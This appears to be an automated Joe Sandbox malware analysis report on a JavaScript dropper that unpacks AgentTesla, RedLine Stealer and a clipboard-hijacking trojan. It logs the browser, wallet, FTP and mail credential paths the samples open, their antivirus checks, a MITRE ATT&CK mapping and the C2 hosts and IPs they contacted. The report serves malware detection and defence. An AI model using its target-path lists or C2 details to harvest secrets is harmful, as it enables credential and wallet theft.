                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,2_2_004720DB
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00472C3F GetUserNameW,2_2_00472C3F
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,2_2_0041E364
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,2_2_0040E500
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Users\user\AppData\Local\Temp\build.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Yara detected AgentTesla
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 16.2.svchost.exe.3189000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.3189000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 19.0.build.exe.f40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                Tries to harvest and steal ftp login credentials
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                                Tries to steal Crypto Currency Wallets
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                Source: C:\Users\user\AppData\Local\Temp\build.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                Tries to steal Mail credentials (via file / registry access)
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                                Source: x.exeBinary or memory string: WIN_XP
                                Source: x.exe, 0000000D.00000000.1642698601.0000000000482000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                                Source: x.exeBinary or memory string: WIN_XPe
                                Source: x.exeBinary or memory string: WIN_VISTA
                                Source: x.exeBinary or memory string: WIN_7
                                Source: x.exeBinary or memory string: WIN_8
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

                                Remote Access Functionality

                                barindex
                                Yara detected AgentTesla
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 16.2.svchost.exe.3189000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.svchost.exe.3189000.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 19.0.build.exe.f40000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_004652BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00476619
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,2_2_0046CEF3
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,4_2_004652BE
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_00476619
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,4_2_0046CEF3

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information13
                                Scripting                                		2
                                Valid Accounts                                		331
                                Windows Management Instrumentation                                		13
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		111
                                Disable or Modify Tools                                		2
                                OS Credential Dumping                                		2
                                System Time Discovery                                		Remote Services11
                                Archive Collected Data                                		2
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts21
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		11
                                Deobfuscate/Decode Files or Information                                		221
                                Input Capture                                		1
                                Account Discovery                                		Remote Desktop Protocol3
                                Data from Local System                                		11
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts2
                                Exploitation for Client Execution                                		2
                                Valid Accounts                                		2
                                Valid Accounts                                		4
                                Obfuscated Files or Information                                		1
                                Credentials in Registry                                		3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Email Collection                                		1
                                Non-Standard Port                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts3
                                Command and Scripting Interpreter                                		1
                                Windows Service                                		21
                                Access Token Manipulation                                		1
                                Timestomp                                		NTDS228
                                System Information Discovery                                		Distributed Component Object Model221
                                Input Capture                                		1
                                Data Encoding                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts1
                                Scheduled Task/Job                                		1
                                Scheduled Task/Job                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		LSA Secrets1
                                Query Registry                                		SSH4
                                Clipboard Data                                		2
                                Non-Application Layer Protocol                                		Scheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable Media2
                                Service Execution                                		2
                                Registry Run Keys / Startup Folder                                		212
                                Process Injection                                		1
                                Masquerading                                		Cached Domain Credentials541
                                Security Software Discovery                                		VNCGUI Input Capture123
                                Application Layer Protocol                                		Data Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		DCSync341
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                                Registry Run Keys / Startup Folder                                		341
                                Virtualization/Sandbox Evasion                                		Proc Filesystem3
                                Process Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow11
                                Application Window Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                                Process Injection                                		Network Sniffing1
                                System Owner/User Discovery                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                System Network Configuration Discovery                                		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519256 Sample: RFQ -PO.20571-0001-QBMS-PRQ... Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 72 s82.gocheapweb.com 2->72 74 pywolwnvd.biz 2->74 76 api.ipify.org 2->76 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Malicious sample detected (through community Yara rule) 2->94 96 10 other signatures 2->96 15 wscript.exe 1 2 2->15         started        19 TrojanAIbot.exe 2->19         started        21 TrojanAIbot.exe 2->21         started        signatures3 process4 file5 64 C:\Users\user\AppData\Local\Temp\x.exe, PE32 15->64 dropped 84 Benign windows process drops PE files 15->84 86 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->86 88 Suspicious execution chain found 15->88 23 x.exe 1 15->23         started        signatures6 process7 signatures8 122 Antivirus detection for dropped file 23->122 124 Machine Learning detection for dropped file 23->124 126 Switches to a custom stack to bypass stack traces 23->126 26 x.exe 23->26         started        28 svchost.exe 23->28         started        process9 process10 30 x.exe 26->30         started        32 svchost.exe 26->32         started        process11 34 x.exe 30->34         started        36 svchost.exe 30->36         started        process12 38 x.exe 34->38         started        40 svchost.exe 34->40         started        process13 42 x.exe 38->42         started        45 svchost.exe 38->45         started        signatures14 128 Writes to foreign memory regions 42->128 130 Maps a DLL or memory area into another process 42->130 47 svchost.exe 5 42->47         started        process15 file16 66 C:\Users\user\AppData\...\server_BTC.exe, PE32 47->66 dropped 68 C:\Users\user\AppData\Local\...\neworigin.exe, PE32 47->68 dropped 70 C:\Users\user\AppData\Local\Temp\build.exe, PE32 47->70 dropped 50 server_BTC.exe 7 47->50         started        54 neworigin.exe 47->54         started        57 build.exe 47->57         started        process17 dnsIp18 62 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 50->62 dropped 98 Antivirus detection for dropped file 50->98 100 Multi AV Scanner detection for dropped file 50->100 102 Machine Learning detection for dropped file 50->102 118 2 other signatures 50->118 59 powershell.exe 50->59         started        78 s82.gocheapweb.com 51.195.88.199, 587, 62828, 62829 OVHFR France 54->78 80 api.ipify.org 104.26.13.205, 443, 62826 CLOUDFLARENETUS United States 54->80 104 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 54->104 106 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 54->106 108 Tries to steal Mail credentials (via file / registry access) 54->108 120 2 other signatures 54->120 82 212.162.149.53, 2049, 62827 UNREAL-SERVERSUS Netherlands 57->82 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 57->110 112 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 57->112 114 Tries to harvest and steal browser information (history, passwords, etc) 57->114 116 Tries to steal Crypto Currency Wallets 57->116 file19 signatures20 process21 signatures22 132 Loading BitLocker PowerShell Module 59->132

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.js24%ReversingLabsScript-JS.Trojan.Heuristic
                                RFQ -PO.20571-0001-QBMS-PRQ-0200140.js100%AviraJS/TrojanDropper.MA

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Temp\server_BTC.exe100%AviraHEUR/AGEN.1311721
                                C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%AviraHEUR/AGEN.1311721
                                C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1321671
                                C:\Users\user\AppData\Local\Temp\neworigin.exe100%AviraTR/Spy.Gen8
                                C:\Users\user\AppData\Local\Temp\build.exe100%AviraTR/AD.RedLineSteal.dzdht
                                C:\Users\user\AppData\Local\Temp\server_BTC.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\neworigin.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\build.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\build.exe92%ReversingLabsWin32.Ransomware.RedLine
                                C:\Users\user\AppData\Local\Temp\neworigin.exe79%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                                C:\Users\user\AppData\Local\Temp\server_BTC.exe83%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                                C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe83%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                https://api.ipify.org/0%URL Reputationsafe
                                212.162.149.53:20490%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                pywolwnvd.biz
                                		54.244.188.177
                                		truefalse
                                  		unknown
                                  api.ipify.org
                                  		104.26.13.205
                                  		truefalse
                                    		unknown
                                    s82.gocheapweb.com
                                    		51.195.88.199
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://api.ipify.org/false
                                      • URL Reputation: safe
                                      		unknown
                                      212.162.149.53:2049true
                                      • Avira URL Cloud: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.13.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      51.195.88.199
                                      		s82.gocheapweb.comFrance
                                      		16276OVHFRtrue
                                      212.162.149.53
                                      		unknownNetherlands
                                      		64236UNREAL-SERVERSUStrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1519256
                                      Start date and time:2024-09-26 09:20:12 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 11m 24s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:36
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • GSI enabled (Javascript)
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
